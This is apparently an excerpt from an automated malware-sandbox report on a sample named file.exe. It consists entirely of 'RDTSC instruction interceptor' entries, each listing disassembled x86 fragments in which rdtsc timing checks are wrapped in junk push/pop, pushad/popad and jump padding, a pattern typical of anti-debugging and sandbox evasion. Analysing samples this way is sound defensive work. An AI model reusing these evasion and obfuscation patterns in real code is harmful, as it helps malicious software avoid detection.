Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 578AC5 second address: 578ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F37B4535CD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A473 second address: 57A479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A479 second address: 57A50C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F37B4535CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F37B4535CD8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 pushad 0x0000002a mov esi, dword ptr [ebp+122D20A6h] 0x00000030 mov dx, ax 0x00000033 popad 0x00000034 push 00000000h 0x00000036 or esi, dword ptr [ebp+122D382Ch] 0x0000003c call 00007F37B4535CD9h 0x00000041 jmp 00007F37B4535CDEh 0x00000046 push eax 0x00000047 jmp 00007F37B4535CDCh 0x0000004c mov eax, dword ptr [esp+04h] 0x00000050 jmp 00007F37B4535CDAh 0x00000055 mov eax, dword ptr [eax] 0x00000057 push eax 0x00000058 push edx 0x00000059 jc 00007F37B4535CE8h 0x0000005f jmp 00007F37B4535CE2h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A50C second address: 57A512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A512 second address: 57A5A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F37B4535CE4h 0x00000011 pop eax 0x00000012 movzx ecx, bx 0x00000015 push 00000003h 0x00000017 mov edx, dword ptr [ebp+122D38A0h] 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D1BABh], eax 0x00000025 push 00000003h 0x00000027 push 96AFF87Fh 0x0000002c push esi 0x0000002d jmp 00007F37B4535CE9h 0x00000032 pop esi 0x00000033 add dword ptr [esp], 29500781h 0x0000003a push edi 0x0000003b xor dword ptr [ebp+122D2397h], esi 0x00000041 pop ecx 0x00000042 lea ebx, dword ptr [ebp+1245133Fh] 0x00000048 call 00007F37B4535CDAh 0x0000004d sub dword ptr [ebp+122D2DE6h], edx 0x00000053 pop edx 0x00000054 xchg eax, ebx 0x00000055 pushad 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 jbe 00007F37B4535CD6h 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 jo 00007F37B4535CD6h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A5A2 second address: 57A5C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007F37B453709Eh 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A764 second address: 57A786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F37B4535CD6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A882 second address: 57A886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A886 second address: 57A8B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007F37B4535CD6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F37B4535CD6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57A8B3 second address: 57A8C1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F37B4537096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59B2DB second address: 59B2FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE8h 0x00000007 pushad 0x00000008 jnp 00007F37B4535CD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5990A4 second address: 5990B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 56CB53 second address: 56CB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 599206 second address: 59920A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59920A second address: 599231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B4535CE0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F37B4535CE1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 599231 second address: 599236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 599236 second address: 59923C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59938E second address: 599393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 599393 second address: 5993A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F37B4535CDFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5993A7 second address: 5993C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F37B45370A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5993C6 second address: 5993CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 599579 second address: 59957D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5996D0 second address: 5996D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5996D8 second address: 5996F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F37B453709Fh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 599EFF second address: 599F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 599F05 second address: 599F2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F37B45370A0h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 599F2C second address: 599F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 599F30 second address: 599F56 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F37B4537096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F37B45370A3h 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 599F56 second address: 599F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B4535CDCh 0x00000009 jnc 00007F37B4535CD6h 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F37B4535CE5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 599F86 second address: 599F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59A28C second address: 59A290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59A290 second address: 59A296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59A296 second address: 59A2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F37B4535CE1h 0x0000000c jnp 00007F37B4535CD6h 0x00000012 popad 0x00000013 jl 00007F37B4535CDAh 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c pop eax 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F37B4535CE6h 0x00000025 jmp 00007F37B4535CE3h 0x0000002a pop edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59A2F0 second address: 59A2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5627A1 second address: 5627C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F37B4535CD6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59A9F3 second address: 59AA1E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F37B4537096h 0x00000009 jmp 00007F37B45370A8h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59AA1E second address: 59AA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B4535CE1h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59ACD2 second address: 59ACD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59ACD6 second address: 59ACDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59B133 second address: 59B157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B453709Ch 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F37B45370A0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59E55C second address: 59E560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59EB97 second address: 59EB9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59EB9B second address: 59EBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push esi 0x0000000d jbe 00007F37B4535CD6h 0x00000013 pop esi 0x00000014 jmp 00007F37B4535CDCh 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c push edx 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59EBC2 second address: 59EBFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jc 00007F37B4537096h 0x00000012 jmp 00007F37B45370A0h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F37B45370A7h 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59DBB8 second address: 59DBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F37B4535CD6h 0x0000000a popad 0x0000000b jo 00007F37B4535CDCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59DBCB second address: 59DBE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F37B45370A2h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59DBE5 second address: 59DBEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A000D second address: 5A0012 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A0012 second address: 5A0042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B4535CE7h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F37B4535CE2h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A0042 second address: 5A0046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E521 second address: 56E527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E527 second address: 56E532 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E532 second address: 56E538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5A08 second address: 5A5A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5A0C second address: 5A5A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5B7C second address: 5A5B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F37B4537096h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5B8B second address: 5A5B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5B8F second address: 5A5BB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F37B45370A2h 0x0000000f jbe 00007F37B4537096h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5BB7 second address: 5A5BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5BBF second address: 5A5BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5D37 second address: 5A5D50 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F37B4535CD6h 0x00000008 jnp 00007F37B4535CD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jns 00007F37B4535CD6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A650C second address: 5A6545 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F37B4537096h 0x00000008 jmp 00007F37B45370A5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnl 00007F37B453709Ch 0x00000015 pop edx 0x00000016 pushad 0x00000017 push esi 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pop esi 0x0000001b jo 00007F37B453709Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A82B7 second address: 5A82BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A82BC second address: 5A82C6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F37B453709Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A82C6 second address: 5A82EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 398901C5h 0x0000000d je 00007F37B4535CDCh 0x00000013 mov edi, dword ptr [ebp+122D37BCh] 0x00000019 push 3F2ACDCCh 0x0000001e jc 00007F37B4535CF0h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8460 second address: 5A8481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B453709Bh 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F37B453709Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A865F second address: 5A8665 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8E42 second address: 5A8E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8E4A second address: 5A8E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8F2D second address: 5A8F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8F31 second address: 5A8F35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8F35 second address: 5A8F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A93D3 second address: 5A93D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A93D7 second address: 5A93F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F37B45370A7h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A99B0 second address: 5A9A08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F37B4535CDCh 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D2288h], eax 0x00000016 push 00000000h 0x00000018 mov esi, eax 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F37B4535CD8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9A08 second address: 5A9A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA323 second address: 5AA32D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F37B4535CD6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA32D second address: 5AA331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA1C9 second address: 5AA1E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F37B4535CE0h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA1E7 second address: 5AA1EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA3B9 second address: 5AA3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA3BE second address: 5AA3C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F37B4537096h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA3C8 second address: 5AA3F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F37B4535CEFh 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB478 second address: 5AB4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jmp 00007F37B453709Dh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F37B4537098h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 jmp 00007F37B453709Bh 0x0000002c push 00000000h 0x0000002e cmc 0x0000002f push 00000000h 0x00000031 add edi, dword ptr [ebp+122D3780h] 0x00000037 push eax 0x00000038 jnp 00007F37B453709Eh 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AAB16 second address: 5AAB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F37B4535CD6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AD416 second address: 5AD42D instructions: 0x00000000 rdtsc 0x00000002 je 00007F37B4537098h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F37B4537096h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AD42D second address: 5AD43D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4333 second address: 5B4339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4339 second address: 5B433D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
